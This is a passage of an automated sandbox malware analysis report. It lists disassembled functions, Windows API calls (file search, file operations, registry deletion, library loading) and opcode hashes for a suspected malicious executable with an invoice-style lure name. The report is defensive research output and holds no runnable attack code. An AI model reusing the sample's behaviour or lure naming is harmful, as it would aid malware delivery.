                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                    • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                                    • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                    • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                    • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                                    • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                    • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                    • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                                                    • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                    • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                                                    APIs
                                                                      • Part of subcall function 0040635D: FindFirstFileW.KERNELBASE(75C43420,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0,75C43420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75C43420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                                      • Part of subcall function 0040635D: FindClose.KERNEL32(00000000), ref: 00406374
                                                                    • lstrlenW.KERNEL32 ref: 0040222A
                                                                    • lstrlenW.KERNEL32(00000000), ref: 00402235
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                    • String ID:
                                                                    • API String ID: 1486964399-0
                                                                    • Opcode ID: 6f56652a97e9f2e71844242f6fb96bffa0205b02d5e9fc23a5abba9676a77795
                                                                    • Instruction ID: 68adc47ec14bb7f1455d9e4f3972770a16c24003edb5f963a0030e9918aa5f94
                                                                    • Opcode Fuzzy Hash: 6f56652a97e9f2e71844242f6fb96bffa0205b02d5e9fc23a5abba9676a77795
                                                                    • Instruction Fuzzy Hash: 9B117C71E10218AACB10EFF98949A9EB7B8AF14314F10857BA805FB2D5D6B8D9008B59
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 3850602802-2153329232
                                                                    • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                    • Instruction ID: 41fb3c375bc4c6d8b97388dc18782044d705989845ec456808571e00864cea1f
                                                                    • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                    • Instruction Fuzzy Hash: 76C09B717443017BDA308F509D49F1777556794B40F54C8797700F60D0C674E451D61D
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,00403F3F), ref: 00404121
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 3850602802-2153329232
                                                                    • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                    • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                                    • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                    • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: EnumErrorLastWindows
                                                                    • String ID:
                                                                    • API String ID: 14984897-0
                                                                    • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                    • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                    • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                    • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                    APIs
                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000023F,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3677997916-0
                                                                    • Opcode ID: a3f87ad3f1da05a98cf3aadeecb9e43e743a7fc37039c3bd1d0140df53f4af7c
                                                                    • Instruction ID: e4ac8c9376200f70c7981abe7f64d2c812767dcd2539a2364c5f8151efcc43ed
                                                                    • Opcode Fuzzy Hash: a3f87ad3f1da05a98cf3aadeecb9e43e743a7fc37039c3bd1d0140df53f4af7c
                                                                    • Instruction Fuzzy Hash: 75117331915205EBDB14CFA4DA489BEB7B4FF44354F20843FE405B72D0D6B89A41EB5A
                                                                    APIs
                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000023F,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValue
                                                                    • String ID:
                                                                    • API String ID: 849931509-0
                                                                    • Opcode ID: db37aab07c6febc306c627fa3463b658d2fc8de9235b708c14f34681f1499571
                                                                    • Instruction ID: 619afea56069f31c127a8e11fd0f1f435edbd74989573f139d652fd0604b037d
                                                                    • Opcode Fuzzy Hash: db37aab07c6febc306c627fa3463b658d2fc8de9235b708c14f34681f1499571
                                                                    • Instruction Fuzzy Hash: 8AF0AF32A04100ABEB10BFB48A4EABE72699B80314F14843BF501B71D1C9FC9D025629
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 4b0d864b1a2dd4535223f3397756779258a6f0df93d6f6798cb5ef9ea5707675
                                                                    • Instruction ID: 14d99bf0b22e04dc8d6d27e1a0bb6c10309fac34fbb9e600a12b00824ffe684e
                                                                    • Opcode Fuzzy Hash: 4b0d864b1a2dd4535223f3397756779258a6f0df93d6f6798cb5ef9ea5707675
                                                                    • Instruction Fuzzy Hash: 5EE04F32B001049BCB24CBA8ED808AE77A6AB88320750453FD902B36A0CA74DC51CF28
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                      • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                      • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                                                      • Part of subcall function 00406384: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                                    • Instruction ID: 5dc38b7c1614d08ea85e9237aecc352f838a6b2874e2c17184f6d3a6923fef4e
                                                                    • Opcode Fuzzy Hash: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                                    • Instruction Fuzzy Hash: 02E086326081225BD31157715D4497776A8AA9D640306043EFD06F61C1D774AC219AAD
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableShow
                                                                    • String ID:
                                                                    • API String ID: 1136574915-0
                                                                    • Opcode ID: 909c371eceaa2562e83db2b5d8033b49118b56588e2e61d3ca2e47006e387992
                                                                    • Instruction ID: c65acc83bfa495384d8d8e75d5cf87c092469090b0d1be5324bf36691b182b4f
                                                                    • Opcode Fuzzy Hash: 909c371eceaa2562e83db2b5d8033b49118b56588e2e61d3ca2e47006e387992
                                                                    • Instruction Fuzzy Hash: C1E08C32A04100ABC720AFB5AA8999D3375EF90369B10057BE402F10E1C6BCAC409A2E
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405BF3
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405C15
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                    • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                                                    • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                    • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                                                    • GetLastError.KERNEL32 ref: 004056D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
